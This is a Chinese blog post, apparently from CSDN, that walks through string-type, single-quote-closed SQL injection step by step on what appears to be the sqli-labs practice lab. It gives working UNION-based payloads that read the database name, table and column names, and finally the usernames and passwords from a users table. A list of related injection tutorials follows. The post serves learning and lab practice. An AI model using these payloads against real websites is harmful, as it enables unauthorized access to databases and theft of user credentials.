SQL注入(字符型,单引号闭合)

最新推荐文章于 2024-06-05 14:13:37 发布
最新推荐文章于 2024-06-05 14:13:37 发布
阅读量7.7k 收藏 45
点赞数 8
分类专栏: 安全 SQL注入 文章标签: SQL注入 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43695031/article/details/102944222
版权

SQL注入(字符型,单引号闭合)

1、判断为字符型还是整型,?为连接符
?id=1 and 1=2
在这里插入图片描述当不报错说明为字符型,反之则是整型
2、构造闭合
?id=1’and%20 ‘1’='1
说明是单引号闭合则可以用 --+ 来注释掉后面的 ’
例如:?id=1’ --+

也可以用 ?id=1’来判断,出错了就说明判断对了,因为在源语句中后面多出了一个 ,所以采用上面 –+ 来注释掉后面的
在这里插入图片描述3、判断显示位
?id=-1’ union all select 1,2,3–+ // 这时要注意前面的id要等于-1,这样才能执行后面的语句

说明显示位是 2和3 位,接下来就可以搞事情了
在这里插入图片描述4、用database()暴库名

?id=-1’ union all select 1,database(),3–+
得出库名为 security
在这里插入图片描述5、有了库名就可以得到表明
?id=-1’ union all select 1,2,group_concat(table_name) from information_schema.tables where table_schema = ‘security’ --+
在这里插入图片描述选一个自己感兴趣的表,我这里就选了users,下来搞出他的列名
?id=-1’ union all select 1,2,group_concat(column_name) from information_schema.columns where table_name = ‘users’ and table_schema=‘security’ --+
在这里插入图片描述

6、最后一步,来看他的用户名和密码,使用group_concat(刚才的列名) from

?id=-1’ union all select 1,group_concat(username),group_concat(password) from users --+
在这里插入图片描述成了!!!

噜噜噜噜噜
关注
  • 8
    点赞
  • 45
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入的原理分析
monkey:的博客
09-23 997
SQL注入的原理分析 一、注入攻击的本质 1.注入攻击的本质,是把用户输入的数据当作代码执行。 $uname = $_REQUEST['uname']; $sql = "select*from admin where uname = '$uname'"; select*from admin where uname = 'a'; 恶意传参:select*from admin where uname = 'a' and 1 = 1#' ('用一个单引号将前方语句闭合)(and 1 = 1被当作代码
SQL注入原理及如何判断闭合
热门推荐
大大大蜜蜂的博客
09-30 1万+
一、SQL注入原理: 造成SQL注入的原因: 在没有对用户的输入进行过滤、检测的情况下,就把用户输入数据,带入到数据库中执行SQL语句。 利用SQL注入: 由于系统没有对输入的数据进行过滤、检测,就带入到数据库中执行SQL语句,那么当用户输入一条恶意的数据,使其与原SQL语句拼接、重组得到一条恶意的SQL语句,当数据库执行这条恶意的SQL语句时,就会把数据库中的信息暴露出来,从而泄露信息。 访问网页具体流程图: 在上图中,用户访问实验楼主页进行了如下过程: 1、在 Web 浏览器中输入 www.shiya
sql注入详解
最新发布
Cairo_A的博客
06-05 859
SQL注入是由于程序没有对用户输入数据的合法性进行验证和过滤,导致SQL查询语句被恶意拼接从 而产生SQL注入
SQL注入原理-字符注入
T1ngSh0w的博客
09-13 8909
SQL注入原理-字符注入
SQL注入漏洞基础(三)
qq_59611876的博客
12-16 483
只要这个程序是人写的,那么一定会存在SQL注入的点。当Web应用向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。
sqllabs详解与知识点汇总(内含代码审计)
Samblue_M的博客
02-03 5004
sqllabs闯关记录 关于注释符的详解 SQL注入注释符(#、-- 、/**/)使用条件及其他注释方式的探索 - impulse- - 博客园 (cnblogs.com) HTTP请求方法------GET 对比 POST HTTP 方法:GET 对比 POST | 菜鸟教程 (runoob.com) 来自知乎的绕过 SQL注入:各种绕过检测的姿势 - 知乎 (zhihu.com) Less-1~4 @读题-------------get方式提交 @Error based—报错注入 @Single quo
sql注入的思维导图。
04-19
* 数字注入:不需要单引号闭合字符。 * 字符注入:需要单引号或其他符号闭合。 * 搜索查询方法:使用select、insert、delete、update、order by等语句来查询数据库信息。 防御方法 防御SQL注入的方法有多种...
三种数据库的 SQL 注入详解
08-03
数字字符注入最大的区别在于:数字不需要单引号闭合,而字符一般需要使用单引号闭合字符注入最关键的是如何闭合 SQL 语句以及注释多余的代码。 判断字符漏洞的 SQL 注入点可以通过以下步骤: ①...
关于sql注入的简要演示(入坑抛砖)
09-09
然而,如果用户输入的不是一个单纯的数字,而是一个包含SQL语法的字符串,比如`'`(单引号),事情就变得有趣了。 在SQL中,单引号用于包围字符串常量。如果一个查询中字符串常量的结束单引号被省略或者被另一个单...
sql注入之新手入门示例详解
09-10
在本例中,通过闭合或注释单引号,比如`id=1 AND '1'='1 #`或`id=1 AND 1=1 --+`,我们可以确认`id`参数的注入可能性。一旦验证成功,下一步就是利用这个漏洞执行更复杂的SQL语句,可能包括读取数据、修改记录,甚至...
关于sql语句的闭合方式
12-14
- **单引号**('):大多数SQL方言,包括MySQL、SQL Server、Oracle和PostgreSQL,都使用单引号来封闭字符数据。例如,`SELECT * FROM table WHERE column = 'value'`。 - **双引号**("):在某些情况下,例如...
sql注入的学习
weixin_71008408的博客
01-28 1136
然后我们继续猜,但是要动脑子去猜,如果说他有几十列,我们不可能挨个去试,所以人还是要多读书,此时,我们就可以采取二分法,我们往大的猜,一半一半的缩小范围,专业又高效,但是这里并不是直接去更改select后的数字,而是利用数据库本身的代码order by(排序)去钻个空子。3.获取数据库,表名,列名,因为我们想要拿到管理员的账号密码,所以我们需要找到账号密码的存放位置,而在这之前,我们就要想办法找到表名,列名,而获取的的方法就是 猜。这样我们就拿到一些关键信息,username,password。
SQL注入概述
MAPLE102424的博客
04-17 2710
SQL注入概述
sql注入之时间盲注
ljj20020718的博客
11-25 315
sql注入之时间盲注
sqli-labs-master【Less-7/8】
weixin_44352521的博客
12-14 200
Less-7 可以看出,Less-7页面回显就两种结果,这关同样没有显示位,只会返回正确和错误两种结果,报错至少语法错误会回显错误在页面,所以一般这种都是用于布尔注入来爆破; 1. 构造闭合 http://192.168.228.129/sqli-labs-master/Less-7/?id=1‘)) --+ 因为这种不会有回显,所以我们只能通过一些函数来猜,那么我们先来介绍几种函数,...
SQL注入学习笔记
Lionel_kai的博客
07-23 313
SQL注入原理: SQL注入是开发者对用户输入的参数过滤不严格,导致用户输入端数据能影响预设查询功能的一种技术,通常将导致数据库的原有信息泄露,篡改,甚至被删除。 注入分类: 1.数字注入: 判断方法:在URL地址栏构造?id=1',不符合语法肯定会报错,页面回显异常 继续构造?id=1 and 1=2,这是个永远假条件,因此页面仍然返回异常 继续构造?id=1 and 1=1,这个查询语句正确,页面返回与...
union注入之字符注入和数值注入
ws1813004226的博客
05-12 706
什么是SQL注入SQL注入就是web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带进数据库查询,攻击者可以通过构造不同的SQL语句实现对数据库的任意操作。 字符注入 判断方法:当输入的参数类字符时,数据库执行的查询语句为:select * from users where id=‘x’,我们可以使用’1’=‘1和’1’=‘2判断是否存在SQL注入。 url 地址中输入 http://xxx/abc.php?id= x’ and ‘1’=‘1 页面运行正常,继
sql注入闭合方式
qq_67667368的博客
03-31 2137
由于系统没有对输入的数据进行过滤、检测,就带入到数据库中执行SQL语句,那么当用户输入一条恶意的数据,使其与原SQL语句拼接、重组得到一条恶意的SQL语句,当数据库执行这条恶意的SQL语句时,就会把数据库中的信息暴露出来,从而泄露信息。MYSQL数据库的包容性比较强,如果你输错了数据的类,MYSQL数据库会自动将其转换成正确的数据类,比如输入1)、1"、1-等,只要数字后面的字符不是闭合符的,数据库都会把你输入的错误的数据转换成正确的数据类
SQL 字符注入
MZa1213123的博客
03-02 4394
CTFHub SQL 字符注入 可以看到我们输入的数据会被单引号所括上 尝试正常的 1 and 1=2 发现没有报错 还是有回显 字符的 1 and 1=2 就相当于只是字符串 并没有发挥其表达式的作用所以这就没有产生错误回显 (不太明白为什么 sql 还是会查询到id = 1 的数据) 这时候我们添加 ' 手动闭合前一个 sql 语句然后再拼接上我们的 sql 语句进行测试 整个的 sql 语句大概是 $ sql = "select Data from table_name .
sql注入单引号闭合原理
08-26
具体来说,SQL注入单引号闭合原理是利用输入的字符串中的单引号来终止原始查询中的字符串值,并插入额外的SQL代码。这可以通过以下几个步骤实现: 1. 在用户输入中插入一个单引号:攻击者将在用户的输入中插入一...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值